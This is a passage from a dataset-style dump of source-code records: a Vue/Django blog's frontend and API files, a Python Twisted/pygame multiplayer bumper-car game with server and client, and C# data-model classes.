loading\n }\n}\n\nexport default {\n state,\n actions,\n mutations\n}\n" }, { "alpha_fraction": 0.4579256474971771, "alphanum_fraction": 0.4618395268917084, "avg_line_length": 16.03333282470703, "blob_id": "cc74a8c2b86283d515b59ad84e93959977c49542", "content_id": "6abd91fd5401dc0d5a4f2df0472432fa197c919e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 519, "license_type": "no_license", "max_line_length": 38, "num_lines": 30, "path": "/blogproject/frontend/src/components/blog/mixins.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "export default {\n data () {\n return {\n }\n },\n computed: {\n state () {\n return this.$store.state.blog\n },\n tags () {\n return this.state.tags\n },\n categories () {\n return this.state.categories\n },\n collapseData () {\n return [{\n title: '分类',\n name: '1',\n isCollapse: true,\n collapseItems: this.categories\n }, {\n title: '标签',\n name: '2',\n isCollapse: true,\n collapseItems: this.tags\n }]\n }\n }\n}\n" }, { "alpha_fraction": 0.6433333158493042, "alphanum_fraction": 0.6433333158493042, "avg_line_length": 24.08333396911621, "blob_id": "17f11f5e1157931f40ed7a284e7b9e2f4e5b01f8", "content_id": "97c84a14e054b19485899916ef56f8146207e195", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 312, "license_type": "no_license", "max_line_length": 57, "num_lines": 12, "path": "/blogproject/blog/urls.py", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . 
import views\n\n# set the url namespace\napp_name = 'blog'\n\nurlpatterns = [\n    path('list/', views.index, name='index'),\n    path('list/<int:pk>/', views.detail, name='detail'),\n    path('categories/', views.category, name='category'),\n    path('tags/', views.tag, name='tag')\n]" }, { "alpha_fraction": 0.6533575057983398, "alphanum_fraction": 0.6533575057983398, "avg_line_length": 29.66666603088379, "blob_id": "372b8f8f4db8d871454f404eb28fe157a8627c29", "content_id": "71171de1f87806a7ad62114190f21d223afd26df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 551, "license_type": "no_license", "max_line_length": 128, "num_lines": 18, "path": "/blogproject/blog/serializers.py", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\n\nfrom .models import Post, Category, Tag\n\nclass PostSerializers (serializers.ModelSerializer):\n    class Meta:\n        model = Post\n        fields = ('id', 'title', 'body', 'img', 'created_time', 'modified_time', 'excerpt', 'authors_id', 'category_id', 'tags')\n\nclass CategorySerializers (serializers.ModelSerializer):\n    class Meta:\n        model = Category\n        fields = ('id', 'name')\n\nclass TagSerializers (serializers.ModelSerializer):\n    class Meta:\n        model = Tag\n        fields = ('id', 'name')" }, { "alpha_fraction": 0.6217391490936279, "alphanum_fraction": 0.6310558915138245, "avg_line_length": 27.288135528564453, "blob_id": "1dcfe987de4c524acaa44308c7fe2c958408a56f", "content_id": "3d1ac65afa01e1bd48e182707b005bdf27dafedb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1610, "license_type": "no_license", "max_line_length": 79, "num_lines": 59, "path": "/blogproject/frontend/src/common/video.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "class Video {\n  constructor ({ container, video }) {\n    this.container = container\n    this.video = video\n    this.init = this.init.bind(this)\n    this.update = this.update.bind(this)\n  }\n\n  // set style\n  _setStyle (element, style) {\n    Object.keys(style).forEach(item => {\n      element.style[item] = style[item]\n    })\n  }\n\n  init () {\n    this._setStyle(this.container, {\n      'position': 'relative',\n      'width': '100%',\n      'height': '100%',\n      'overflow': 'hidden',\n      'box-sizing': 'border-box'\n    })\n    this._setStyle(this.video, {\n      'position': 'absolute',\n      'top': '50%',\n      'left': '50%',\n      'transform': 'translate(-50%, -50%)',\n      'object-fit': 'cover' // fix the white space around video when fullscreen\n    })\n  }\n\n  update () {\n    const videoWidth = this.video.videoWidth\n    const videoHeight = this.video.videoHeight\n    const videoRatio = Number((videoWidth / videoHeight).toFixed(2))\n\n    const containerStyles = window.getComputedStyle(this.container)\n    const minWidth = parseInt(containerStyles.getPropertyValue('width'))\n    const minHeight = parseInt(containerStyles.getPropertyValue('height'))\n\n    const widthRatio = minWidth / videoWidth\n    const heightRatio = minHeight / videoHeight\n\n    let newWidth, newHeight\n    if (widthRatio > heightRatio) {\n      newWidth = minWidth\n      newHeight = Math.ceil(newWidth / videoRatio)\n    } else {\n      newHeight = minHeight\n      newWidth = Math.ceil(newHeight * videoRatio)\n    }\n\n    this.video.style.width = newWidth + 'px'\n    this.video.style.height = newHeight + 'px'\n  }\n}\n\nexport default Video\n" } ]
10
DavidZisky/deep_learning
https://github.com/DavidZisky/deep_learning
056ddf992d0082e321f79b9945d0b8284c7ed61b
e7f0cc27f9c83d2256a9978684c5e20ec8a840db
f7dcb285a0efc6969f8b277c8f8dd46ea316e981
refs/heads/master
2021-08-20T09:28:32.371475
2017-11-28T20:02:16
2017-11-28T20:02:16
112382233
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6835871338844299, "alphanum_fraction": 0.6920473575592041, "avg_line_length": 31.83333396911621, "blob_id": "1f8ed1b3adfdfcde289dac705d8b43ca8b9f1777", "content_id": "c5ef1076ca0ecbcff2a3c22e153db9b1cf6df821", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 591, "license_type": "no_license", "max_line_length": 62, "num_lines": 18, "path": "/ClassifyNB.py", "repo_name": "DavidZisky/deep_learning", "src_encoding": "UTF-8", "text": "def classify(features_train, labels_train):\n ### import the sklearn module for GaussianNB\n ### create classifier\n ### fit the classifier on the training features and labels\n ### return the fit classifier\n\n ### komentarz\n # nowy kom\n\n ### your code goes here!\n from sklearn import tree\n from sklearn.naive_bayes import GaussianNB\n from sklearn.svm import SVC\n #from sklearn.naive_bayes import GaussianNB\n #clf = tree.DecisionTreeClassifier(min_samples_split=2)\n clf = SVC(gamma=3, C=500)\n data = clf.fit(features_train, labels_train)\n return data\n" } ]
1
vhawley/paradigms-final
https://github.com/vhawley/paradigms-final
eb896cd677e5beb9c94f8c877ba777a8e17e5833
9e29d461a7d9da13776adf724037823a20a5ef8b
47c0a45ef1a0f9d3b14703fb07af393b5785b529
refs/heads/master
2021-01-20T06:56:53.647645
2015-05-06T18:40:53
2015-05-06T18:40:53
34129359
0
1
null
2015-04-17T17:07:21
2015-05-02T23:36:00
2015-05-03T01:50:54
Python
[ { "alpha_fraction": 0.6128600239753723, "alphanum_fraction": 0.6383121013641357, "avg_line_length": 33.150325775146484, "blob_id": "1f4cd58f71afd72a37205946f7c9be8be1bd5eba", "content_id": "24ca8e1684d0651f06fab6d031db93e5af7ca627", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10451, "license_type": "no_license", "max_line_length": 179, "num_lines": 306, "path": "/server.py", "repo_name": "vhawley/paradigms-final", "src_encoding": "UTF-8", "text": "from twisted.internet.protocol import Factory\nfrom twisted.internet.protocol import ClientFactory\nfrom twisted.protocols.basic import LineReceiver\nfrom twisted.internet import reactor\n\nimport sys\nimport os\nimport thread\n\nimport pygame\nfrom math import *\nfrom pygame.locals import *\n\nimport random\n\nclass Player(pygame.sprite.Sprite):\n\tdef __init__(self, gs=None, number=0, x=0, y=0, angle=0):\n\t\tself.gs = gs\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.angle = angle\n\t\tself.collisionangle = self.angle\n\t\tself.number = number\n\t\tself.speed = 0\n\t\tself.acceleration = 3\n\t\tself.maxspeed = 8\n\t\tself.maxhealth = 32.0\n\t\tself.health = self.maxhealth\n\t\tself.hit = 0\n\t\tself.powerup = -1\n\t\tself.poweruptimer = 0\n\n\tdef tick(self):\n\t\t#self.powerupimages = [\"doubledamage.png\", \"health.png\", \"invuln.png\", \"speed.png\"]\n\t\tif (not self.powerup == -1):\n\t\t\tif self.poweruptimer <= 0:\n\t\t\t\tself.powerup = -1\n\t\t\t\tself.maxspeed = 8\n\t\t\t\tself.acceleration = 3\n\t\t\telse:\n\t\t\t\tself.poweruptimer = self.poweruptimer - 1\n\t\t\t\tif self.powerup == 1:\n\t\t\t\t\tself.health = self.health + 10.0\n\t\t\t\t\tself.poweruptimer = 0\n\t\t\t\t\tself.powerup = -1\n\t\t\t\tif self.powerup == 3:\n\t\t\t\t\tself.maxspeed = 14\n\t\t\t\t\tself.acceleration = 5\n\t\t\t\t\n\t\tif (self.hit == 1):\n\t\t\tself.speed = self.speed - 0.75 * float(self.acceleration) / float(self.gs.tickrate)\n\t\t\tif (self.speed <= 0):\n\t\t\t\tself.hit = 0\n\t\t\tdeltax = self.speed * -1 * cos(radians(self.collisionangle))\n\t\t\tdeltay = self.speed * sin(radians(self.collisionangle))\n\t\t\tif (not (self.x + deltax > self.gs.width - 20 or self.x + deltax < 20)):\n\t\t\t\tself.x = self.x + deltax\n\t\t\tif (not (self.y + deltay > self.gs.height - 20 or self.y + deltay < 20)):\n\t\t\t\tself.y = self.y + deltay\n\n\t\telse:\n\t\t\tif (self.gs.keysheld[self.number][K_UP] == 1): #accelerate forward\n\t\t\t\tif (self.speed < 0):\n\t\t\t\t\tself.speed = min(self.speed + 2 * float(self.acceleration) / float(self.gs.tickrate), 0)\n\t\t\t\telif (self.speed >= 0):\n\t\t\t\t\tself.speed = min(self.speed + float(self.acceleration) / float(self.gs.tickrate), self.maxspeed)\n\t\t\tif (self.gs.keysheld[self.number][K_DOWN] == 1): #brakes/reverse\n\t\t\t\tif (self.speed <= 0):\n\t\t\t\t\tself.speed = max(self.speed - float(self.acceleration) / float(self.gs.tickrate), -1 * self.maxspeed)\n\t\t\t\telif (self.speed > 0):\n\t\t\t\t\tself.speed = max(self.speed - 2 * float(self.acceleration) / float(self.gs.tickrate), 0)\n\t\t\telif (self.gs.keysheld[self.number][K_UP] == 0): #slow down\n\t\t\t\tif (self.speed < 0):\n\t\t\t\t\tself.speed = min(self.speed + 0.75 * float(self.acceleration) / float(self.gs.tickrate), 0)\n\t\t\t\telif (self.speed > 0):\n\t\t\t\t\tself.speed = max(self.speed - 0.75 * float(self.acceleration) / float(self.gs.tickrate), 0)\n\t\t\tif (self.gs.keysheld[self.number][K_LEFT] == 1): #turn left\n\t\t\t\tif (self.speed >= 0):\n\t\t\t\t\tself.angle = (self.angle + 3) % 
360\n\t\t\t\telse:\n\t\t\t\t\tself.angle = (self.angle - 3) % 360\n\t\t\t\n\t\t\tif (self.gs.keysheld[self.number][K_RIGHT] == 1): #turn right\n\t\t\t\tif (self.speed >= 0):\n\t\t\t\t\tself.angle = (self.angle - 3) % 360\n\t\t\t\telse:\n\t\t\t\t\tself.angle = (self.angle + 3) % 360\n\n\t\t\tdeltax = self.speed * -1 * cos(radians(self.angle))\n\t\t\tdeltay = self.speed * sin(radians(self.angle))\n\t\t\tif (not (self.x + deltax > self.gs.width - 20 or self.x + deltax < 20)):\n\t\t\t\tself.x = self.x + deltax\n\n\t\t\tif (not (self.y + deltay > self.gs.height - 20 or self.y + deltay < 20)):\n\t\t\t\tself.y = self.y + deltay\n\t\t\n\nclass Powerup:\n\tdef __init__(self, gs=None, number=0, x=0, y=0):\n\t\tself.gs = gs\n\t\tself.number = number\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.visible = True\n\nclass GameSpace:\n\tdef __init__(self, factory):\n\t\tself.factory = factory\n\t\tself.players = list()\n\t\tself.cars = [\"ambulance.png\", \"audi.png\", \"blackviper.png\", \"car.png\", \"minitruck.png\", \"minivan.png\", \"police.png\", \"taxi.png\", \"truck.png\"]\n\t\tself.powerupimages = [\"doubledamage.png\", \"health.png\", \"invuln.png\", \"speed.png\"]\n\t\tself.powerups = list()\n\n\tdef getDistanceDifference(self, p1, p2): # returns distance between two player cars in pixels\n\t\tdif = sqrt(pow(p1.x-p2.x,2) + pow(p1.y-p2.y,2))\n\t\treturn dif\n\n\tdef getAngleDifference(self, p1, p2): # returns mathematically difference of two car angles (in degrees)\n\t\treturn p1.angle - p2.angle\n\n\tdef getAngleOfImpact(self, p1, p2): # returns angle of straight line between two cars (in degrees)\n\t\treturn degrees(atan2(p1.y-p2.y, p1.x-p2.x))\n\n\tdef detectPowerup(self):\n\t\tfor player in self.players:\n\t\t\tfor powerup in self.powerups:\n\t\t\t\tif powerup.visible == True:\n\t\t\t\t\tif self.getDistanceDifference(player,powerup) <= 50:\n\t\t\t\t\t\tplayer.powerup = powerup.number\n\t\t\t\t\t\tplayer.poweruptimer = 600 #in ticks\n\t\t\t\t\t\tpowerup.visible = False\n\t\t\t\t\t\t\n\tdef numRemainingPlayers(self):\n\t\tcount = 0\n\t\tfor player in self.players:\n\t\t\tif player.health > 0:\n\t\t\t\tcount = count + 1\n\t\treturn count\n\n\tdef detectCollisions(self):\n\t\tfor i in range(0,len(self.players)-1):\n\t\t\tif (self.players[i].health <= 0):\n\t\t\t\tcontinue\n\t\t\tfor j in range(i+1,len(self.players)):\n\t\t\t\tif (self.players[j].health <= 0):\n\t\t\t\t\tcontinue\n\t\t\t\tdistance = self.getDistanceDifference(self.players[i],self.players[j])\n\t\t\t\tif (distance < 75): # maximum distance difference that could be collision\n\t\t\t\t\ttotalspeed = abs(float(self.players[i].speed + self.players[j].speed))\n\t\t\t\t\n\t\t\t\t\tif (totalspeed > 2 and self.players[i].hit == 0 and self.players[j].hit == 0):\n\t\t\t\t\t\tself.players[i].hit = 1\n\t\t\t\t\t\tself.players[j].hit = 1\n\t\t\t\t\n\t\t\t\t\t\tif (self.players[i].speed > self.players[j].speed):\n\t\t\t\t\t\t\tself.players[i].collisionangle = 360 - self.players[i].angle\n\t\t\t\t\t\t\tself.players[j].collisionangle = self.players[i].angle\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.players[i].collisionangle = self.players[j].angle\n\t\t\t\t\t\t\tself.players[j].collisionangle = 360 - self.players[j].angle\n\t\t\t\t\t\tif (self.players[i].powerup != 2):\n\t\t\t\t\t\t\tif (self.players[j].powerup == 0):\n\t\t\t\t\t\t\t\tself.players[i].health = self.players[i].health - max(1,2 * abs(self.players[j].speed))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.players[i].health = self.players[i].health - 
max(1,abs(self.players[j].speed))\n\t\t\t\t\t\tif (self.players[j].powerup != 2):\n\t\t\t\t\t\t\tif (self.players[i].powerup == 0):\n\t\t\t\t\t\t\t\tself.players[j].health = self.players[j].health - max(1,2 * abs(self.players[i].speed))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.players[j].health = self.players[j].health - max(1,2 * abs(self.players[i].speed))\n\n\t\t\t\t\t\tself.players[i].speed = 0.5 * totalspeed\n\t\t\t\t\t\tself.players[j].speed = 0.5 * totalspeed\n\t\t\t\t\t\t\n\t\t\t\t\t\tsound = random.randint(1,4)\n\t\t\t\t\t\tfor client in self.factory.clients:\n\t\t\t\t\t\t\tclient.sendLine(\"SOUND,\" + str(sound))\n\t\t\t\t\t\t\n\t\t\t\t\n\tdef main(self):\n\t\t# 1) basic init\n\t\tpygame.init()\n\t\tself.debug = 0\n\t\tself.size = self.width, self.height = 1024, 768\n\n\t\tself.black = 0, 0, 0\n\n\t\t#self.screen = pygame.display.set_mode(self.size)\n\t\t\n\t\tself.trackedinputs = [K_UP, K_DOWN, K_LEFT, K_RIGHT]\n\t\t\n\n\t\t#get playernumber from server after connecting\n\t\tself.keysheld = list()\n\t\tfor player in self.players:\n\t\t\tself.keysheld.append(dict())\n\t\t\tfor key in self.trackedinputs:\n\t\t\t\tself.keysheld[player.number][key] = 0\n\t\tself.tickrate = 60\n\t\tself.counter = 0\n\t\n\t\t# 2) set up game objects\n\t\tself.clock = pygame.time.Clock()\n\n\n\t\t# 3) start game loop\n\t\twhile 1:\n\t\t\t# 4) regulate tick speed\n\t\t\tself.clock.tick(self.tickrate)\n\n\t\t\t# 6) ongoing behavior\n\t\t\tfor player in self.players:\n\t\t\t\tplayer.tick()\n\t\t\tif self.numRemainingPlayers() <= 1:\n\t\t\t\twinner = -1\n\t\t\t\tfor player in self.players:\n\t\t\t\t\tif player.health > 0:\n\t\t\t\t\t\twinner = player.number\n\t\t\t\tfor client in self.factory.clients:\n\t\t\t\t\tclient.sendLine(\"GAMEEND,\" + str(winner))\n\t\t\t\tbreak\n\t\t\tself.detectPowerup()\n\t\t\tself.detectCollisions()\n\t\t\t\t\n\t\t\t\n\t\t\tfor player in self.players:\n\t\t\t\tfor client in self.factory.clients:\n\t\t\t\t\tclient.sendLine(\"PLAYER,\" + str(player.number) + \",\" + str(player.x) + \",\" + str(player.y) + \",\" + str(player.angle) + \",\" + str(player.health) + \",\" + str(player.maxhealth))\n\n\t\t\tfor client in self.factory.clients:\n\t\t\t\tclient.sendLine(\"POWERUP,START\")\n\t\t\tfor powerup in self.powerups:\n\t\t\t\tif powerup.visible == True:\n\t\t\t\t\tfor client in self.factory.clients:\n\t\t\t\t\t\tclient.sendLine(\"POWERUP,\" + str(powerup.number) + \",\" + str(powerup.x) + \",\" + str(powerup.y))\n\t\t\tself.counter = self.counter + 1\n\t\t\tif (self.counter == 750):\n\t\t\t\tnewx = 40 + random.randint(0,self.width-80)\n\t\t\t\tnewy = 40 + random.randint(0,self.height-80)\n\t\t\t\tpoweruptype = random.randint(0,len(self.powerupimages)-1)\n\t\t\t\tself.powerups.append(Powerup(self, poweruptype, newx, newy))\n\t\t\t\tself.counter = 0\n\t\t\t\t\n\t\t\t# get new messages from server and update player states\n\t\t\t\n\nclass GameLineReceiver(LineReceiver):\n def __init__(self,factory,gs):\n self.name = None\n\tself.factory = factory\n self.gs = gs\n self.state = \"ADDPLAYER\" \n\n def connectionMade(self):\n\tif self.state == \"ADDPLAYER\":\n self.handle_ADDPLAYER()\n else:\n self.handle_PLAY()\t\n\t\n def connectionLost(self,reason):\n\tprint \"connection lost. 
remove player from game\"\n\n def lineReceived(self, line):\n \tprint line\n\tline = line.strip().split(',')\n\tif line[0] == \"INPUT\":\n\t\tplaynum = int(line[1])\n\t\tkeyevent = int(line[2])\n\t\tkey = int(line[3])\n\t\tself.gs.keysheld[playnum][key] = -1 * (keyevent - 3) #1 if 2, 0 if 3\n\n def handle_ADDPLAYER(self):\n ## data received is used for creating a new player in the game\n ## set name\n if (len(self.gs.players) == 0):\n \tself.gs.players.append(Player(self.gs, len(self.gs.players), 50 + float(len(self.gs.players)) / 8.0 * 700, 300, 270))\n\t\tself.sendLine(str(len(self.gs.players) - 1))\n elif (len(self.gs.players) >= 1):\n \tself.gs.players.append(Player(self.gs, len(self.gs.players), 50 + float(len(self.gs.players)) / 8.0 * 700, 300, 270))\n\t\tself.sendLine(str(len(self.gs.players) - 1))\n \tself.state = \"PLAY\"\n \tthread.start_new_thread(self.gs.main, ())\n \n\tif (len(self.gs.players) >= 2):\n\t\tfor client in self.factory.clients:\n\t\t\tclient.sendLine(\"START\")\n\n def handle_PLAY(self):\n \tif (len(self.gs.players) >= 0 and len(self.gs.players) < 4):\n \tself.gs.players.append(Player(self.gs, len(self.gs.players), 50 + float(len(self.gs.players)) / 8.0 * 700, 300, 270))\n \tself.sendLine(str(len(self.gs.players) - 1))\n else:\n\t\tself.sendLine(\"-1\")\n\t\tself.sendLine(str(len(self.gs.players) - 1))\n\nclass GameFactory(Factory):\n def __init__(self):\n self.gs = GameSpace(self)\n\tself.clients = list()\n\n def buildProtocol(self,addr):\n\tself.clients.append(GameLineReceiver(self, self.gs))\n return self.clients[len(self.clients)-1]\n\nreactor.listenTCP(40077, GameFactory())\nreactor.run()\n\n" }, { "alpha_fraction": 0.6164318323135376, "alphanum_fraction": 0.6423935294151306, "avg_line_length": 30.42288589477539, "blob_id": "e7585ff46b5bab2d54e9bac7d89067222a1477db", "content_id": "d25dd3cc1acf77f172186770549d3bb8f700df26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6317, "license_type": "no_license", "max_line_length": 143, "num_lines": 201, "path": "/client.py", "repo_name": "vhawley/paradigms-final", "src_encoding": "UTF-8", "text": "from twisted.internet.protocol import Factory\nfrom twisted.internet.protocol import ClientFactory\nfrom twisted.protocols.basic import LineReceiver\nfrom twisted.internet import reactor\n\nimport sys\nimport os\nimport thread\n\nimport pygame\nfrom math import *\nfrom pygame.locals import *\n\nclass Player(pygame.sprite.Sprite):\n\tdef __init__(self, gs=None, number=0, x=0, y=0, angle=0):\n\t\tself.gs = gs\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.angle = angle\n\t\tself.maxhealth = 32.0\n\t\tself.health = self.maxhealth\n\t\tself.number = number\n\n\t\tself.baseimage = pygame.transform.scale(pygame.image.load(\"cars/\" + self.gs.cars[self.number]),(100,100))\n\t\tself.image = pygame.transform.rotate(self.baseimage, self.angle + 90)\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect = self.rect.move(x, y)\n\t\tself.rect = self.rect.move(self.rect.width / -2, self.rect.height / -2)\n\n\tdef tick(self):\n\t\tself.image = pygame.transform.rotate(self.baseimage, self.angle + 90)\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect = self.rect.move(self.x, self.y)\n\t\tself.rect = self.rect.move(self.rect.width / -2, self.rect.height / -2)\n\nclass Powerup:\n\tdef __init__(self, gs=None, number=0, x=0, y=0):\n\t\tself.gs = gs\n\t\tself.number = number\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.image = pygame.image.load(\"powerups/\" + 
self.gs.powerupimages[self.number])\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect = self.rect.move(x, y)\n\t\tself.rect = self.rect.move(self.rect.width / -2, self.rect.height / -2)\n\nclass GameSpace:\n\tdef __init__(self, lr, number):\n\t\tself.players = list()\n\t\tself.lr = lr\n\t\tself.playernumber = number\n\t\tself.cars = [\"ambulance.png\", \"audi.png\", \"blackviper.png\", \"car.png\", \"minitruck.png\", \"minivan.png\", \"police.png\", \"taxi.png\", \"truck.png\"]\n\t\tself.powerupimages = [\"doubledamage.png\", \"health.png\", \"invuln.png\", \"speed.png\"]\n\t\tself.powerups = list()\n\t\tself.gameover = 0\n\t\tself.winner = 0\n\t\t\n\tdef main(self):\n\t\t# 1) basic init\n\t\tpygame.init()\n\t\tpygame.mixer.init()\n\t\tself.sounds = list()\n\t\tfor i in range(1,5):\n\t\t\tself.sounds.append(pygame.mixer.Sound(\"sound/crash\" + str(i) + \".wav\"))\n\t\tself.debug = 0\n\t\tself.size = self.width, self.height = 1024, 768\n\n\t\tself.black = 0, 0, 0\n\n\t\tself.screen = pygame.display.set_mode(self.size)\n\n\t\tself.trackedinputs = [K_UP, K_DOWN, K_LEFT, K_RIGHT]\n\n\t\tself.keysheld = {}\n\t\tfor tinput in self.trackedinputs:\n\t\t\tself.keysheld[tinput] = 0\n\t\tself.tickrate = 60\n\t\n\t\t# 2) set up game objects\n\t\tself.clock = pygame.time.Clock()\n\t\t\n\n\t\t# 3) start game loop\n\t\twhile self.gameover == 0:\n\t\t\t# 4) regulate tick speed\n\t\t\tself.clock.tick(self.tickrate)\n\n\t\t\t# 5) handle user input events\n\t\t\tfor event in pygame.event.get():\n\t\t\t\t# send relevant player inputs to server for processing\n\t\t\t\tif (event.type == KEYDOWN) or (event.type == KEYUP):\n\t\t\t\t\tif (event.key in self.trackedinputs):\n\t\t\t\t\t\t# only relevant inputs need to be sent to server\n\t\t\t\t\t\tself.lr.sendLine(\"INPUT,\" + str(self.playernumber) + \",\" + str(event.type) + \",\" + str(event.key))\n\t\t\t\t\t\tif (event.type == KEYDOWN):\n\t\t\t\t\t\t\tself.keysheld[event.key] = 1\n\t\t\t\t\t\telif (event.type == KEYUP):\n\t\t\t\t\t\t\tself.keysheld[event.key] = 0\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit()\n\n\t\t\t# 6) ongoing behavior\n\t\t\tfor player in self.players:\n\t\t\t\tplayer.tick()\n\n\t\t\tself.screen.fill(self.black)\n\t\t\tfor player in self.players:\n\t\t\t\tif (player.health > 0):\n\t\t\t\t\tself.screen.blit(player.image, player.rect)\n\t\t\t\t\thealthpct = float(player.health) / player.maxhealth\n\t\t\t\t\thealthrect = Rect(player.x - 48, player.y - 48, healthpct * 97, 7)\n\t\t\t\t\thealthborder = Rect(player.x - 50, player.y - 50, 100, 10)\n\t\t\t\t\tif self.playernumber == player.number:\n\t\t\t\t\t\tpygame.draw.rect(self.screen,(255,255,255), healthborder, 2)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpygame.draw.rect(self.screen,(0,0,255), healthborder, 2)\n\t\t\t\t\tif (healthpct < 0.20):\n\t\t\t\t\t\tpygame.draw.rect(self.screen,(255,0,0), healthrect, 0)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpygame.draw.rect(self.screen,(0,255,0), healthrect, 0)\n\t\t\tfor powerup in self.powerups:\n\t\t\t\tself.screen.blit(powerup.image, powerup.rect)\n\n\t\t\tpygame.display.flip()\n\t\t\n\t\tself.screen.fill(self.black)\n\t\tfont = pygame.font.Font(None,36)\n\t\tif (self.winner == 1):\n\t\t\tendGameText = font.render(\"You won!\", 1 , (255,255,255))\n\t\telse:\n\t\t\tendGameText = font.render(\"You lose!\", 1 , (255,255,255))\n\t\ttextrect = endGameText.get_rect()\n\t\ttextrect.centerx = self.width / 2\n\t\ttextrect.centery = self.height / 2\n\t\tself.screen.blit(endGameText, textrect)\n\t\tpygame.display.flip()\n\t\twhile 1:\n\t\t\tfor event in 
pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit()\n\n##################################################\n\nclass BumperClient(LineReceiver):\n\tdef __init__(self):\n\t\tself.state = \"WAITING\"\n\t\tself.playernumber = -1\n\t\tself.gs = None\n\tdef lineReceived(self, line):\n\t\tline = line.strip()\n\t\tif (self.state == \"WAITING\"):\n\t\t\tself.playernumber = int(line)\n\t\t\tif self.playernumber == -1:\n\t\t\t\tsys.exit(\"Game full. Exiting...\")\n\t\t\tself.state = \"READY\"\n\t\t\tself.gs = GameSpace(self, self.playernumber)\n\t\t\t\n\t\telif (self.state == \"READY\" and line == \"START\"):\n\t\t\tthread.start_new_thread(self.gs.main, ())\n\t\t\tself.state = \"PLAYING\"\n\t\telif (self.state == \"PLAYING\"):\n\t\t\tline = line.strip().split(',')\n\t\t\tif line[0] == \"PLAYER\":\n\t\t\t\tif (len(self.gs.players) <= int(line[1])):\n\t\t\t\t\tself.gs.players.append(Player(self.gs, int(line[1]), float(line[2]), float(line[3]), float(line[4])))\n\t\t\t\telse:\n\t\t\t\t\tself.gs.players[int(line[1])].x = float(line[2])\n\t\t\t\t\tself.gs.players[int(line[1])].y = float(line[3])\n\t\t\t\t\tself.gs.players[int(line[1])].angle = float(line[4])\n\t\t\t\tself.gs.players[int(line[1])].health = float(line[5])\n\t\t\t\tself.gs.players[int(line[1])].maxhealth = float(line[6])\n\t\t\telif line[0] == \"POWERUP\":\n\t\t\t\tprint line\n\t\t\t\tif line[1] == \"START\":\n\t\t\t\t\tself.gs.powerups = list()\n\t\t\t\telse:\n\t\t\t\t\tself.gs.powerups.append(Powerup(self.gs, int(line[1]), int(line[2]), int(line[3])))\n\t\t\telif line[0] == \"SOUND\":\n\t\t\t\tself.gs.sounds[int(line[1])-1].play()\n\t\t\telif line[0] == \"GAMEEND\":\n\t\t\t\tself.gs.gameover = 1\n\t\t\t\twinner = int(line[1])\n\t\t\t\tif winner == self.gs.playernumber:\n\t\t\t\t\tself.gs.winner = 1\n\t\t\t\t\t\n\t\telse:\n\t\t\tprint line\n\t\t\n\nclass BumperClientFactory(ClientFactory):\n\tdef buildProtocol(self, addr):\n\t\tnewconn = BumperClient()\n\t\treturn newconn\n\n##################################################\n\nmyfactory = BumperClientFactory()\n\nreactor.connectTCP('student00.cse.nd.edu', 40077, myfactory)\n\nreactor.run()\n\n" } ]
2
JasonLuoBetter/BeautifulCountryside
https://github.com/JasonLuoBetter/BeautifulCountryside
7b51dd0cc3a864f3391135c9f511e1a73c505cea
61d8f92aaa02412a61a4d2101c1bfac651203368
2ce7ba93a83a1101f4ecc3f33970187d890327ee
refs/heads/master
2020-03-06T18:28:39.798829
2018-03-27T15:40:31
2018-03-27T15:40:31
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6231405138969421, "alphanum_fraction": 0.6264463067054749, "avg_line_length": 22.269229888916016, "blob_id": "2a2290535eeec668ae872ed2d3f2e7ab7c1ed1bf", "content_id": "d2dc84fb5e622215f23cb0fc6b021c8e787c5e23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 605, "license_type": "no_license", "max_line_length": 55, "num_lines": 26, "path": "/GDKQ.Model/Vote_Main.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n public partial class Vote_Main\n {\n public int ID { get; set; }\n\n [StringLength(64)]\n public string Title { get; set; }\n\n public string Body { get; set; }\n\n public DateTime CreateTime { get; set; }\n\n public DateTime EndTime { get; set; }\n\n public bool IsDeleted { get; set; }\n\n public bool Enabled { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.584566593170166, "alphanum_fraction": 0.5951374173164368, "avg_line_length": 22.649999618530273, "blob_id": "bf95a1754137f22fb03bce19d2b473887a29e713", "content_id": "ab1c35fbd83631994789b19fb3bbf3c51b618a16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 946, "license_type": "no_license", "max_line_length": 55, "num_lines": 40, "path": "/GDKQ.Model/Villager.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", 